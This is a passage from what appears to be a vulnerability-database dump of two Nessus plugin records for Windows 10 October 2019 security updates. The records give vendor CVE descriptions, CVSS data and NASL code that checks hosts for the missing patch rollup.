(CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. 
(CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. 
(CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. 
(CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520008.NASL", "href": "https://www.tenable.com/plugins/nessus/129724", "published": "2019-10-08T00:00:00", "title": "KB4520008: Windows 10 Version 1803 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129724);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520008\");\n script_xref(name:\"MSFT\", value:\"MS19-4520008\");\n\n script_name(english:\"KB4520008: Windows 10 Version 1803 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. 
(CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. 
An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. 
(CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). 
An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520008/windows-10-update-kb4520008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ed66c5d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520008');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520008])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:20:00", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520011.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. 
(CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. 
(CVE-2019-1326)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520011.NASL", "href": "https://www.tenable.com/plugins/nessus/129726", "published": "2019-10-08T00:00:00", "title": "KB4520011: Windows 10 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129726);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520011\");\n script_xref(name:\"MSFT\", value:\"MS19-4520011\");\n\n script_name(english:\"KB4520011: Windows 10 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520011.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. 
An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. 
(CVE-2019-1311)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. 
An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. 
An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4520011/windows-10-update-kb4520011\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8905e062\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520011.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
